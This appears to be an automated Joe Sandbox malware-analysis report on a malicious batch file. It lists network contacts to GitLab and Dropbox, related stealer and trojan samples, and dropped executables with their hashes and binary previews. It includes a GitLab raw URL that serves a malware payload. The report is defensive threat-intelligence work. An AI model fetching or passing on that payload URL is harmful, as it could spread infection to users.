                                                                                                                                                                                          https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            172.65.251.78
                                                                                                                                                                                            gitlab.comUnited States
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            162.125.69.18
                                                                                                                                                                                            www-env.dropbox-dns.comUnited States
                                                                                                                                                                                            19679DROPBOXUSfalse
                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                            Analysis ID:1576962
                                                                                                                                                                                            Start date and time:2024-12-17 19:43:06 +01:00
                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 6m 20s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                            Number of analysed new started processes analysed:19
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Sample name:hngarm13de02.bat
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal92.troj.evad.winBAT@28/271@3/2
                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                            • Successful, ratio: 97%
                                                                                                                                                                                            • Number of executed functions: 32
                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Found application associated with file extension: .bat
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 2800 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 5064 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6024 because it is empty
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                            • VT rate limit hit for: hngarm13de02.bat
                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                            13:43:58API Interceptor104x Sleep call for process: powershell.exe modified
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                                            162.125.69.18122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                  cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                    Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                      https://dashboard.sizle.io/p/f7c9cdf19Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        garsukhjdf11.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                          1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                            nbavdfasfGarminde.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                gitlab.com3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                garsukhjdf11.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                nbavdfasfGarminde.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                www-env.dropbox-dns.commjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                edge-block-www-env.dropbox-dns.com122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                CLOUDFLARENETUShttp://kmaybelsrka.sbs:6793/bab.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 104.21.2.110
                                                                                                                                                                                                                Documento_Contrato_Seguro_18951492.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                • 104.18.21.76
                                                                                                                                                                                                                Documento_Contrato_Seguro_25105476.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                • 104.18.21.76
                                                                                                                                                                                                                http://sharefileon.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                                http://www.kukaj-to.chat/sedoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.21.50.223
                                                                                                                                                                                                                5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                • 104.26.0.231
                                                                                                                                                                                                                lavita.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                • 172.67.161.60
                                                                                                                                                                                                                DROPBOXUSmjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ehttp://escrowmedifllc.hostconstructionapp.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                C:\Users\Public\Document\Scripts\normalizer.exegarsukhjdf11.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                  C:\Users\Public\Document\Scripts\pip3.12.exegarsukhjdf11.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                    C:\Users\Public\Document\Scripts\pip.exegarsukhjdf11.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):68976508
                                                                                                                                                                                                                      Entropy (8bit):7.994093339090438
                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                      SSDEEP:1572864:w2PcOa0WKQw0Fpc9vBCUNyWpNBTvL3NauYsHU:NTa03R/1U8BTvL3NtYAU
                                                                                                                                                                                                                      MD5:AC8065F85EB8070A7E4C92B39627FC48
                                                                                                                                                                                                                      SHA1:50A52BF4F8A375CEDA88362E52AAC16A9C9C5D57
                                                                                                                                                                                                                      SHA-256:EF9006D7FA07D0753B4714E1D8B67185B409F888FD8164F69CAD71E09E2DBB88
                                                                                                                                                                                                                      SHA-512:5978B49A5A13F9C1004689D4E6B9E53474CBA9DFBB4EC7C7CDE5BB74164DF707A41BCD30B8D80F57640957529A477DEFF3F55C31DB449A3A8C3931E5A217B6EA
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:PK.........,.Y................Scripts/PK.........=VX0p(Kt...........Scripts/normalizer.exe..`.U.0.dk.'..e.....,..5..M...R6......B;....lM;...EG.g.Q.e..q.aS......T,.R...,.m.....{.......}..~o...}..s.=....p.....p...~,...:..g..>...G.P9..X.|E....pYq.JSN..U..ii....b..6g.iean....x.....V...>.._.'G...R..k.|a...n.}...S...9...A....3.[...Y..]...v...u...9.4.....h......c F..cf5.....AM.......@.......}1I.MC.....|..U.%*$..S..H........W..$....8.....C...qY..s..l....4......t...$...YY...LT=.UM*..-Q..\4..W..L*.)...........py...p..f.......fp.....hp.tJ.9<....t.l.PvZ.s. .^JVqB.^.S....Ni..lW.7-...^g|......9N....k.7..%x.-.*N.c9n'..b..-.5.46^%O-.39$O.O...=.......*.9.h0.,O..8^/x.x.".}.$...&H...\.I.......nrH....0.z..J.&.$...r.......m...M.$..R. -...{Mw.t..'x...Z.X.Zo.......)..^.X($.5i>...{..NO^.\.s.Uj....h..?^-7u*. A...:..l....."_.A..V.w.%.V.Xy.=.J.P.6.....vkU.....M...C.9....$.ERo.....`...c4.?!Gq$^.4.}..8.-@.Z..J_./d...b..o....q4_.T.>.v._....a.k!7.....(.9.Sj..O
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 27142-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 38685626227668133590597632.000000
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):31046
                                                                                                                                                                                                                      Entropy (8bit):5.265533758595518
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:A9gdk/PPz7bbK4UJ5O88oUExBs0yE3dRvJo9z35X2e5ncMh3y9ouCJ:ddknPK5B8odzn6z3V5ncMhC9od
                                                                                                                                                                                                                      MD5:867A653DB3E8155B9B102CAF3789EB9C
                                                                                                                                                                                                                      SHA1:6B72AE366B386FE1482712C92EAFA71D27ABB0B9
                                                                                                                                                                                                                      SHA-256:4A0ACF1B9165DC1F0BB2658539747396D5C78DA55A0230B1446C4E2D8581CBCE
                                                                                                                                                                                                                      SHA-512:30BE1B012DFC56AA85BED49262F09DBE8EB673133AC8FF415473F9E679B7CA9C308413FF956C718D5A38303B1A0F8EFDB93EBCDB4377069F432F5B97609A7452
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.ewj........................h.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.Z...e.e.j...................j.....................e.j...........................d.........d.........Z...G.d...d.........Z.e.j.....................e.j...................e._...........e.e.j...........................e._...........e.e.j...........................e._.........g.d...Z.d.Z.d.Z.d.e.j$..................z...Z...e...d.Z...e...d...Z.d...Z.d...Z.d d...Z.d!d...Z.d"d...Z d"d...Z!d...Z"d...Z#d...Z$d...Z%d...Z&d...Z'd...Z(e)d.k(..r...e(..........y.y.#...d.d.l.Z.Y...x.Y.w.#.e.$.r...d.Z.d...Z.d...Z.d...Z.Y..\w.x.Y.w.#.e.$.r.....d.d...Z.d...Z.Y..lw.x.Y.w.)#.....Nz.pywin32_postinstall.log..wc...........................e.Z.d.Z.d...Z.d...Z.d...Z.y.)...Teec...........................|.|._.........y...N)...f)...self..files.... .uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\../../Scripts/pywin32_postinstall.py..__init__z.Tee.__init__....s..................c...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4638
                                                                                                                                                                                                                      Entropy (8bit):5.317675397318066
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:ZwodWonjw4uFdJnd55vNEWTYEr9uP9cbx3:Zw2OFPnd5NTYEuPil
                                                                                                                                                                                                                      MD5:41671BA459D142D40397F832DE16EA77
                                                                                                                                                                                                                      SHA1:562D054EEAB225426E4E0CCE91627894CB8CFCDA
                                                                                                                                                                                                                      SHA-256:8170E7724D36B3685885E8961958EEDD62F2E8EF1A3A398EBCDA1E05E11B2F70
                                                                                                                                                                                                                      SHA-512:EB97DE481DB33E8C2E5EFB2374F28C7CB6F1FA6F9C1E7550ECDB12A483D9828FB5FE61DD4D59C757A68406F8890FA606746CA1228023F663BE801EBE1CDC72B7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j...................j...................e.........Z...e.j...........................g...e.j...........................z...Z.g.Z.d...Z.d...Z.d...Z.e.d.k(..r...e...........y.y.).z.A test runner for pywin32.....Nc..........................t.........j...................j...................|.........\...}.}.t.........j...................d.|.g.|.z...}.t.........d.|.z.............t.........j...................j.............................t.........j...................|.d.|...........}.t.........d.|...d.|.j.................................t.........j...................j.............................|.j...................r.t.........j...................|...........y.y.).Nz.-uz.--- Running '%s' ---F)...check..cwdz.*** Test script 'z.' exited with )...os..path..split..sys..executable..print..stdout..flush..subprocess..run..returncode..failures..append)...script..cmdline_extras..dirname..scriptname..cmd..results....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):108444
                                                                                                                                                                                                                      Entropy (8bit):6.092160600743894
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Gtu:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Au
                                                                                                                                                                                                                      MD5:E81D6B92F76B08EAB808FF59ACA13F33
                                                                                                                                                                                                                      SHA1:B588B48F292090E46277D924661F7ABDF4C63BCA
                                                                                                                                                                                                                      SHA-256:507498BC73E06611171AB5C765ACE6C8976C8025829EA31F332AB5A89B7CCED6
                                                                                                                                                                                                                      SHA-512:2F14682928D5141809AEF831E4CDCAF63E9A481EB6E8F94898DEABF17C0B23B8F936264692766E24C1EE06C428F157B070C45232BB5261DC19EBFD36A9A4B715
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                      • Filename: garsukhjdf11.bat, Detection: malicious, Browse
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):108432
                                                                                                                                                                                                                      Entropy (8bit):6.0921420023756525
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GGr:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Hr
                                                                                                                                                                                                                      MD5:765951BB101AC5B187537DA554BF99EB
                                                                                                                                                                                                                      SHA1:E3DAE9D4B5DCD555A0A492ED0DF4A16B31317D57
                                                                                                                                                                                                                      SHA-256:00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                                                                                                                                                                                                                      SHA-512:976A2BCCD6119C082F08BE476220703552921B6286D1EC801226863D25B13D86DD81F90F6CC43FEF36E685275E9ECDFE0E00E2FD61D460C7DBB9F6444D233E53
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                      • Filename: garsukhjdf11.bat, Detection: malicious, Browse
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):108432
                                                                                                                                                                                                                      Entropy (8bit):6.0921420023756525
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GGr:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Hr
                                                                                                                                                                                                                      MD5:765951BB101AC5B187537DA554BF99EB
                                                                                                                                                                                                                      SHA1:E3DAE9D4B5DCD555A0A492ED0DF4A16B31317D57
                                                                                                                                                                                                                      SHA-256:00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                                                                                                                                                                                                                      SHA-512:976A2BCCD6119C082F08BE476220703552921B6286D1EC801226863D25B13D86DD81F90F6CC43FEF36E685275E9ECDFE0E00E2FD61D460C7DBB9F6444D233E53
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                      • Filename: garsukhjdf11.bat, Detection: malicious, Browse
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):108432
                                                                                                                                                                                                                      Entropy (8bit):6.0921420023756525
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GGr:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Hr
                                                                                                                                                                                                                      MD5:765951BB101AC5B187537DA554BF99EB
                                                                                                                                                                                                                      SHA1:E3DAE9D4B5DCD555A0A492ED0DF4A16B31317D57
                                                                                                                                                                                                                      SHA-256:00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                                                                                                                                                                                                                      SHA-512:976A2BCCD6119C082F08BE476220703552921B6286D1EC801226863D25B13D86DD81F90F6CC43FEF36E685275E9ECDFE0E00E2FD61D460C7DBB9F6444D233E53
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):27255
                                                                                                                                                                                                                      Entropy (8bit):4.54686109057608
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:XOdxyBu5UtFTKxbNobBudHIZAN216JYUrV0Nqo43AllvC6c7e2wA0e7e8mim6BRG:edx4VW3gHKF/0ei/3Ywqdp3fkA9tt4
